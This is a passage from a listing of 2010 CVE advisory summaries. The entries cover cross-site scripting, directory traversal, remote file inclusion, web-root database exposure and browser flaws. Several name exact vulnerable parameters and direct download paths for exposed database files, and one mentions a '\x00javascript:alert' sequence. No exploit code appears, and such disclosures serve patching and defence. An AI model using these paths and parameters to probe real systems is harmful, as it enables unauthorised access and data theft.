[CVE-2010-1302] Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. [CVE-2010-1293] Cross-site scripting (XSS) vulnerability in the Administrator page in Adobe ColdFusion 8.0, 8.0.1, and 9.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1276] Multiple cross-site scripting (XSS) vulnerabilities in BBSXP 2008 SP2 allow remote attackers to inject arbitrary web script or HTML via the URI in a request to (1) AddPost.asp, (2) AddTopic.asp, (3) Admin_Default.asp, (4) Bank.asp, (5) Manage.asp, and (6) ShowPost.asp. NOTE: the provenance of this information is unknown [CVE-2010-1275] Cross-site scripting (XSS) vulnerability in ShowPost.asp in BBSXP 2008 allows remote attackers to inject arbitrary web script or HTML via the ThreadID parameter. [CVE-2010-1274] Cross-site scripting (XSS) vulnerability in Emweb Wt before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to "insertions of the URL" that occur during a redirection. [CVE-2010-1273] Emweb Wt before 3.1.1 does not validate the UTF-8 encoding of (1) form values and (2) JSignal arguments, which has unspecified impact and remote attack vectors. [CVE-2010-1267] Multiple directory traversal vulnerabilities in WebMaid CMS 0.2-6 Beta and earlier allow remote attackers to read arbitrary files via directory traversal sequences in the com parameter to (1) cContactus.php, (2) cGuestbook.php, and (3) cArticle.php. [CVE-2010-1266] Multiple PHP remote file inclusion vulnerabilities in WebMaid CMS 0.2-6 Beta and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) template, (2) menu, (3) events, and (4) SITEROOT parameters to template/babyweb/index.php [CVE-2010-1236] The protocolIs function in platform/KURLGoogle.cpp in WebCore in WebKit before r55822, as used in Google Chrome before 4.1.249.1036 and Flock Browser 3.x before 3.0.0.4112, does not properly handle whitespace at the beginning of a URL, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted javascript: URL, as demonstrated by a \x00javascript:alert sequence. [CVE-2010-1233] Multiple integer overflows in Google Chrome before 4.1.249.1036 allow remote attackers to have an unspecified impact via vectors involving WebKit JavaScript objects. [CVE-2010-1230] Google Chrome before 4.1.249.1036 does not have the expected behavior for attempts to delete Web SQL Databases and clear the Strict Transport Security (STS) state, which has unspecified impact and attack vectors. [CVE-2010-1227] Cross-site scripting (XSS) vulnerability in Sun Java System Communications Express 6.2 and 6.3 allows remote attackers to inject arbitrary web script or HTML via the subject field of a message, as demonstrated by a subject containing an IMG element with a SRC attribute that performs a cross-site request forgery (CSRF) attack involving the cmd and argv parameters to cmd.msc. [CVE-2010-1218] Cross-site scripting (XSS) vulnerability in the mm_forum extension 1.8.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1213] The importScripts Web Worker method in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 does not verify that content is valid JavaScript code, which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted HTML document. [CVE-2010-1209] Use-after-free vulnerability in the NodeIterator implementation in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, allows remote attackers to execute arbitrary code via a crafted NodeFilter that detaches DOM nodes, related to the NodeIterator interface and a javascript callback. [CVE-2010-1206] The startDocumentLoad function in browser/base/content/browser.js in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, does not properly implement the Same Origin Policy in certain circumstances related to the about:blank document and a document that is currently loading, which allows (1) remote web servers to conduct spoofing attacks via vectors involving a 204 (aka No Content) status code, and allows (2) remote attackers to conduct spoofing attacks via vectors involving a window.stop call. [CVE-2010-1195] Cross-site scripting (XSS) vulnerability in the htmlscrubber component in ikiwiki 2.x before 2.53.5 and 3.x before 3.20100312 allows remote attackers to inject arbitrary web script or HTML via a crafted data:image/svg+xml URI. [CVE-2010-1193] Cross-site scripting (XSS) vulnerability in WebAccess in VMware Server 2.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to JSON error messages. [CVE-2010-1189] MediaWiki before 1.15.2 does not prevent wiki editors from linking to images from other web sites in wiki pages, which allows editors to obtain IP addresses and other information of wiki users by adding a link to an image on an attacker-controlled web site, aka "CSS validation issue." [CVE-2010-1186] Cross-site scripting (XSS) vulnerability in xml/media-rss.php in the NextGEN Gallery plugin before 1.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the mode parameter. [CVE-2010-1182] Multiple unspecified vulnerabilities in the administrative console in IBM WebSphere Application Server (WAS) 7.0.x before 7.0.0.9 on z/OS have unknown impact and attack vectors. [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1164] Multiple cross-site scripting (XSS) vulnerabilities in Atlassian JIRA 3.12 through 4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) element or (2) defaultColor parameter to the Colour Picker page [CVE-2010-1143] Cross-site scripting (XSS) vulnerability in VMware View (formerly Virtual Desktop Manager or VDM) 3.1.x before 3.1.3 build 252693 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1137] Cross-site scripting (XSS) vulnerability in WebAccess in VMware VirtualCenter 2.0.2 and 2.5 and VMware ESX 3.0.3 and 3.5, and the Server Console in VMware Server 1.0, allows remote attackers to inject arbitrary web script or HTML via the name of a virtual machine. [CVE-2010-1126] The JavaScript implementation in WebKit allows remote attackers to send selected keystrokes to a form field in a hidden frame, instead of the intended form field in a visible frame, via certain calls to the focus method. [CVE-2010-1119] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1116] LookMer Music Portal stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for dbmdb/LookMerSarkiMDB.mdb. [CVE-2010-1115] Directory traversal vulnerability in news/include/customize.php in Web Server Creator - Web Portal 0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the l parameter. [CVE-2010-1114] Multiple PHP remote file inclusion vulnerabilities in Web Server Creator - Web Portal 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) pg parameter to index.php and the (2) path parameter to news/form.php. [CVE-2010-1113] Cross-site scripting (XSS) vulnerability in the forum page in Web Server Creator - Web Portal 0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors to index.php. [CVE-2010-1112] Cross-site scripting (XSS) vulnerability in cat.php in KloNews 2.0 allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2010-1111] Multiple cross-site scripting (XSS) vulnerabilities in Jokes Complete Website allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to joke.php and the (2) searchingred parameter to results.php. [CVE-2010-1108] Cross-site scripting (XSS) vulnerability in the Control Panel module 5.x through 5.x-1.5 and 6.x through 6.x-1.2 for Drupal allows remote authenticated users, with "administer blocks" privileges, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1105] Cross-site scripting (XSS) vulnerability in cgi/index.php in AdvertisementManager 3.1.0 and 3.6 allows remote attackers to inject arbitrary web script or HTML via the usr parameter. [CVE-2010-1104] Cross-site scripting (XSS) vulnerability in Zope 2.8.x before 2.8.12, 2.9.x before 2.9.12, 2.10.x before 2.10.11, 2.11.x before 2.11.6, and 2.12.x before 2.12.3 allows remote attackers to inject arbitrary web script or HTML via vectors related to error messages. [CVE-2010-1102] Integer overflow in OmniWeb allows remote attackers to bypass intended port restrictions on outbound TCP connections via a port number outside the range of the unsigned short data type, as demonstrated by a value of 65561 for TCP port 25. [CVE-2010-1095] Cross-site scripting (XSS) vulnerability in login_reset_password_page.php in Tracking Requirements & Use Cases (TRUC) 0.11.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter. NOTE: the provenance of this information is unknown [CVE-2010-1091] Multiple cross-site scripting (XSS) vulnerabilities in contact.php in phpMySite allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) city, (3) email, (4) state, and (5) message parameters. [CVE-2010-1080] Cross-site scripting (XSS) vulnerability in view.php in Pulse CMS 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the f parameter. [CVE-2010-1079] Cross-site scripting (XSS) vulnerability in Sawmill before 7.2.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1076] Cross-site scripting (XSS) vulnerability in index.php in Entry Level CMS (EL CMS) allows remote attackers to inject arbitrary web script or HTML via the subj parameter, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown [CVE-2010-1074] Cross-site scripting (XSS) vulnerability in the Currency Exchange module before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to watchdog logging. [CVE-2010-1072] Cross-site scripting (XSS) vulnerability in search.php in Sniggabo CMS 2.21 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2010-1068] Multiple cross-site scripting (XSS) vulnerabilities in surgeftpmgr.cgi in NetWin SurgeFTP 2.3a6 allow remote attackers to inject arbitrary web script or HTML via the (1) domainid or (2) classid parameter in a class action. [CVE-2010-1067] E-membres 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/bdEMembres.mdb. [CVE-2010-1066] AR Web Content Manager (AWCM) 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for control/db_backup.php. [CVE-2010-1065] Lebisoft Ziyaretci Defteri 7.4 and 7.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/lebisoft.mdb. [CVE-2010-1064] Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/ajxgaleri.mdb. [CVE-2010-1052] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AudiStat 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) year and (2) mday parameters. NOTE: the provenance of this information is unknown [CVE-2010-1048] Cross-site scripting (XSS) vulnerability in blog/index.php in Uiga Business Portal allows remote attackers to inject arbitrary web script or HTML via the textcomment parameter (aka the Comment Box) in a noentryid action. NOTE: some of these details are obtained from third party information. [CVE-2010-1041] Unspecified vulnerability in the single sign-on functionality in the Web Services implementation in IBM DB2 Content Manager (CM) Toolkit 8.3 before FP13 on z/OS and DB2 Information Integrator for Content 8.3 before FP13 has unknown impact and remote attack vectors. [CVE-2010-1036] Cross-site scripting (XSS) vulnerability in HP System Insight Manager before 6.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1029] Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of > sequences. [CVE-2010-1028] Integer overflow in the decompression functionality in the Web Open Fonts Format (WOFF) decoder in Mozilla Firefox 3.6 before 3.6.2 and 3.7 before 3.7 alpha 3 allows remote attackers to execute arbitrary code via a crafted WOFF file that triggers a buffer overflow, as demonstrated by the vd_ff module in VulnDisco 9.0. [CVE-2010-1025] Cross-site scripting (XSS) vulnerability in the TGM-Newsletter (tgm_newsletter) extension 0.0.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1023] Cross-site scripting (XSS) vulnerability in the UserTask Center, Recent (taskcenter_recent) extension 0.1.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1021] Cross-site scripting (XSS) vulnerability in the Typo3 Quixplorer (t3quixplorer) extension before 1.7.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1020] Cross-site scripting (XSS) vulnerability in the Simple Gallery (sk_simplegallery) extension 0.0.9 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1014] Cross-site scripting (XSS) vulnerability in the Reports Logfile View (reports_logview) extension 1.2.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1011] Cross-site scripting (XSS) vulnerability in the myDashboard (mydashboard) extension 0.1.13 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1008] Cross-site scripting (XSS) vulnerability in the Sellector.com Widget Integration (chsellector) extension before 0.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1005] Cross-site scripting (XSS) vulnerability in the Yet another TYPO3 search engine (YATSE) extension before 0.3.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0998] Multiple stack-based buffer overflows in Free Download Manager (FDM) before 3.0.852 allow remote attackers to execute arbitrary code via vectors involving (1) the folders feature in Site Explorer, (2) the websites feature in Site Explorer, (3) an FTP URI, or (4) a redirect. [CVE-2010-0997] Cross-site scripting (XSS) vulnerability in 107_plugins/content/content_manager.php in the Content Management plugin in e107 before 0.7.20, when the personal content manager is enabled, allows user-assisted remote authenticated users to inject arbitrary web script or HTML via the content_heading parameter. [CVE-2010-0984] Acidcat CMS 3.5.3 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for databases/acidcat_3.mdb. [CVE-2010-0982] Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. [CVE-2010-0979] Cross-site scripting (XSS) vulnerability in display.php in Obsession-Design Image-Gallery (ODIG) 1.1 allows remote attackers to inject arbitrary web script or HTML via the folder parameter. [CVE-2010-0978] KMSoft Guestbook (aka GBook) 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/db.mdb. [CVE-2010-0977] PD PORTAL 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/db.mdb. [CVE-2010-0971] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.6.4 allow remote authenticated users, with Instructor privileges, to inject arbitrary web script or HTML via the (1) Question and (2) Choice fields in tools/polls/add.php, the (3) Type and (4) Title fields in tools/groups/create_manual.php, and the (5) Title field in assignments/add_assignment.php. NOTE: some of these details are obtained from third party information. [CVE-2010-0965] Jevci Siparis Formu Scripti stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for siparis.mdb. [CVE-2010-0964] SQL injection vulnerability in start.php in Eros Webkatalog allows remote attackers to execute arbitrary SQL commands via the id parameter in a rubrik action. [CVE-2010-0963] Cross-site scripting (XSS) vulnerability in index.php in dl Download Ticket Service before 0.7 allows remote attackers to inject arbitrary web script or HTML via the t parameter, related to an invalid ticket ID. NOTE: some of these details are obtained from third party information. [CVE-2010-0959] Cross-site scripting (XSS) vulnerability in WebEditor/Authentication/LoginPage.aspx in IBM ENOVIA SmarTeam 5 allows remote attackers to inject arbitrary web script or HTML via the errMsg parameter. [CVE-2010-0949] Multiple cross-site scripting (XSS) vulnerabilities in Natychmiast CMS allow remote attackers to inject arbitrary web script or HTML via the id_str parameter to (1) index.php and (2) a_index.php. [CVE-2010-0947] Cross-site scripting (XSS) vulnerability in post.aspx in Max Network Technology BBSMAX 3.0, 4.1, and 4.2 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2010-0941] Multiple cross-site scripting (XSS) vulnerabilities in eTek Systems Hit Counter 2.0 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) inc/login.php, (3) admin/index.php, and (4) admin/forgot.php. [CVE-2010-0940] Cross-site scripting (XSS) vulnerability in guestbook.php in Simple PHP Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2010-0939] Visialis ABB Forum 1.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for fpdb/abb.mdb. [CVE-2010-0938] Cross-site scripting (XSS) vulnerability in todooforum.php in Todoo Forum 2.0 allows remote attackers to inject arbitrary web script or HTML via the id_forum parameter in a post action. [CVE-2010-0936] Cross-site scripting (XSS) vulnerability in auth.asp on the D-LINK DKVM-IP8 with firmware 2282_dlinkA4_p8_20071213 allows remote attackers to inject arbitrary web script or HTML via the nickname parameter. [CVE-2010-0927] Cross-site scripting (XSS) vulnerability in help/readme.nsf/Header in the Help component in IBM Lotus Domino 7.x before 7.0.4 and 8.x before 8.0.2 allows remote attackers to inject arbitrary web script or HTML via the BaseTarget parameter in an OpenPage action. NOTE: this may overlap CVE-2010-0920. [CVE-2010-0921] Cross-site request forgery (CSRF) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 allows remote attackers to hijack the authentication of unspecified victims via vectors related to lack of "XSS/CSRF Get Filter and Referer Check fixes." [CVE-2010-0920] Cross-site scripting (XSS) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 allows remote attackers to inject arbitrary web script or HTML via vectors related to lack of "XSS/CSRF Get Filter and Referer Check fixes." [CVE-2010-0919] Stack-based buffer overflow in the Lotus Domino Web Access ActiveX control in IBM Lotus iNotes (aka Domino Web Access or DWA) 6.5, 7.0 before 7.0.4, 8.0, 8.0.2, and before 229.281 for Domino 8.0.2 FP4 allows remote attackers to execute arbitrary code via a long URL argument to an unspecified method, aka PRAD7JTNHJ. [CVE-2010-0918] Multiple unspecified vulnerabilities in the UltraLite functionality in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 have unknown impact and attack vectors. [CVE-2010-0881] Unspecified vulnerability in the User Interface Components in Oracle Collaboration Suite 10.1.2.4 allows remote attackers to affect integrity via unknown vectors. [CVE-2010-0849] Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is a heap-based buffer overflow in a decoding routine used by the JPEGImageDecoderImpl interface, which allows code execution via a crafted JPEG image. [CVE-2010-0840] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is related to improper checks when executing privileged methods in the Java Runtime Environment (JRE), which allows attackers to execute arbitrary code via (1) an untrusted object that extends the trusted class but has not modified a certain method, or (2) "a similar trust issue with interfaces," aka "Trusted Methods Chaining Remote Code Execution Vulnerability." [CVE-2010-0828] Cross-site scripting (XSS) vulnerability in action/Despam.py in the Despam action module in MoinMoin 1.8.7 and 1.9.2 allows remote authenticated users to inject arbitrary web script or HTML by creating a page with a crafted URI. [CVE-2010-0817] Cross-site scripting (XSS) vulnerability in _layouts/help.aspx in Microsoft SharePoint Server 2007 12.0.0.6421 and possibly earlier, and SharePoint Services 3.0 SP1 and SP2, versions, allows remote attackers to inject arbitrary web script or HTML via the cid0 parameter. [CVE-2010-0814] The Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 and 2007 SP1 and SP2 do not properly interact with the memory-allocation approach used by Internet Explorer during instantiation, which allows remote attackers to execute arbitrary code via a web site that references multiple ActiveX controls, as demonstrated by the ImexGrid and FieldList controls, aka "Access ActiveX Control Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0804] Cross-site scripting (XSS) vulnerability in index.php in iBoutique 4.0 allows remote attackers to inject arbitrary web script or HTML via the key parameter in a products action. [CVE-2010-0797] Cross-site scripting (XSS) vulnerability in the T3BLOG extension 0.6.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0786] The Web Services Security component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.13 does not properly implement the Java API for XML Web Services (aka JAX-WS), which allows remote attackers to cause a denial of service (data corruption) via a crafted JAX-WS request that leads to incorrectly encoded data. [CVE-2010-0785] Cross-site request forgery (CSRF) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.13 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. [CVE-2010-0784] Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0783] Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0782] IBM WebSphere MQ 6.x before 6.0.2.10 and 7.x before 7.0.1.3 allows remote attackers to spoof X.509 certificate authentication, and send or receive channel messages, via a crafted Subject Distinguished Name (DN) value in a certificate. [CVE-2010-0781] Unspecified vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.33 allows remote authenticated users to cause a denial of service (CPU consumption) via a crafted URL. [CVE-2010-0780] IBM WebSphere MQ 7.x before 7.0.1.4 allows remote attackers to cause a denial of service (disk consumption) via multiple connection attempts to a stopped queue manager. [CVE-2010-0779] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.43, 6.1 before 6.1.0.33, and 7.0 before 7.0.0.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0778] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.33 and 7.0 before 7.0.0.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0777] The Web Container in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.43, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 does not properly handle long filenames and consequently sends an incorrect file in some responses, which allows remote attackers to obtain sensitive information by reading the retrieved file. [CVE-2010-0776] The Web Container in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.43, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 does not properly handle chunked transfer encoding during a call to response.sendRedirect, which allows remote attackers to cause a denial of service via a GET request. [CVE-2010-0775] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 allows remote attackers to cause a denial of service (memory consumption and daemon crash) via a crafted request, related to the nodeagent and Deployment Manager components. [CVE-2010-0774] The (1) JAX-RPC WS-Security 1.0 and (2) JAX-WS runtime implementations in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 do not properly handle WebServices PKCS#7 and PKIPath tokens, which allows remote attackers to bypass intended access restrictions via unspecified vectors. [CVE-2010-0772] Unspecified vulnerability in the channel process in IBM WebSphere MQ 7.0 before 7.0.1.2 allows remote authenticated users to cause a denial of service (daemon crash) via "incorrect channel control data." [CVE-2010-0770] IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.9 allows remote authenticated users to cause a denial of service (ORB ListenerThread hang) by aborting an SSL handshake. [CVE-2010-0769] IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.9 does not properly define wsadmin scripting J2CConnectionFactory objects, which allows local users to discover a KeyRingPassword password by reading a cleartext field in the resources.xml file. [CVE-2010-0768] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.9 allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2010-0765] fipsForum 2.6 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for _database/forumFips.mdb. [CVE-2010-0756] Session fixation vulnerability in WikyBlog 1.7.3 rc2 allows remote attackers to hijack web sessions by setting the jsessionid parameter to (1) index.php/Comment/Main, (2) index.php/Comment/Main/Home_Wiky, or (3) index.php/Edit/Main. [CVE-2010-0754] Cross-site scripting (XSS) vulnerability in index.php/Special/Main/Templates in WikyBlog 1.7.2 and 1.7.3 rc2 allows remote attackers to inject arbitrary web script or HTML via the which parameter in a copy action. [CVE-2010-0738] The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method. [CVE-2010-0736] Cross-site scripting (XSS) vulnerability in the view_queryform function in lib/viewvc.py in ViewVC before 1.0.10, and 1.1.x before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via "user-provided input." [CVE-2010-0726] Cross-site scripting (XSS) vulnerability in the tb-send.rb (TrackBack transmission) plugin in tDiary 2.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors, possibly related to the (1) plugin_tb_url and (2) plugin_tb_excerpt parameters. [CVE-2010-0725] Cross-site scripting (XSS) vulnerability in showimg.php in Arab Cart 1.0.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2010-0716] _layouts/Upload.aspx in the Documents module in Microsoft SharePoint before 2010 uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading TXT files, a related issue to CVE-2008-5026. NOTE: the vendor disputes the significance of this issue, because cross-domain isolation can be implemented when needed. [CVE-2010-0715] Open redirect vulnerability in login.jsp in IBM WebSphere Portal, IBM Lotus Web Content Management (WCM), and IBM Lotus Workplace Web Content Management 5.1.0.0 through 5.1.0.5, 6.0.0.0 through 6.0.0.4, 6.0.1.0 through 6.0.1.7, 6.1.0.0 through 6.1.0.3, and 6.1.5.0 [CVE-2010-0714] Cross-site scripting (XSS) vulnerability in login.jsp in IBM WebSphere Portal, IBM Lotus Web Content Management (WCM), and IBM Lotus Workplace Web Content Management 5.1.0.0 through 5.1.0.5, 6.0.0.0 through 6.0.0.4, 6.0.1.0 through 6.0.1.7, 6.1.0.0 through 6.1.0.3, and 6.1.5.0 [CVE-2010-0706] Cross-site scripting (XSS) vulnerability in the login/prompt component in Subex Nikira Fraud Management System allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2010-0704] Cross-site scripting (XSS) vulnerability in the Portlet Palette in IBM WebSphere Portal 6.0.1.5 wp6015_008_01 allows remote attackers to inject arbitrary web script or HTML via the search field. [CVE-2010-0703] Cross-site scripting (XSS) vulnerability in wa/auth in PortWise SSL VPN 4.6 allows remote attackers to inject arbitrary web script or HTML via the reloadFrame parameter. [CVE-2010-0700] Cross-site scripting (XSS) vulnerability in index.php in WampServer 2.0i allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2010-0699] Cross-site scripting (XSS) vulnerability in index.php in VideoSearchScript Pro 3.5 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2010-0697] Cross-site scripting (XSS) vulnerability in the iTweak Upload module 6.x-1.x before 6.x-1.2 and 6.x-2.x before 6.x-2.3 for Drupal allows remote authenticated users, with create content and upload file permissions, to inject arbitrary web script or HTML via the file name of an uploaded file. [CVE-2010-0695] Cross-site scripting (XSS) vulnerability in pages/index.php in BASIC-CMS allows remote attackers to inject arbitrary web script or HTML via the nav_id parameter. [CVE-2010-0686] WebAccess in VMware VirtualCenter 2.0.2 and 2.5, VMware Server 2.0, and VMware ESX 3.0.3 and 3.5 allows remote attackers to leverage proxy-server functionality to spoof the origin of requests via unspecified vectors, related to a "URL forwarding vulnerability." [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action. [CVE-2010-0681] ZeusCMS 0.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request for admin/backup.sql. [CVE-2010-0675] Cross-site scripting (XSS) vulnerability in index.php in BGSvetionik BGS CMS 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the search parameter in a search action. NOTE: some of these details are obtained from third party information. [CVE-2010-0674] StatCounteX 3.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for path/stats.mdb. [CVE-2010-0667] MoinMoin 1.9 before 1.9.1 does not perform the expected clearing of the sys.argv array in situations where the GATEWAY_INTERFACE environment variable is set, which allows remote attackers to obtain sensitive information via unspecified vectors. [CVE-2010-0665] JAG (Just Another Guestbook) 1.14 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request for jag/database.sql. [CVE-2010-0661] WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method. [CVE-2010-0659] The image decoder in WebKit before r52833, 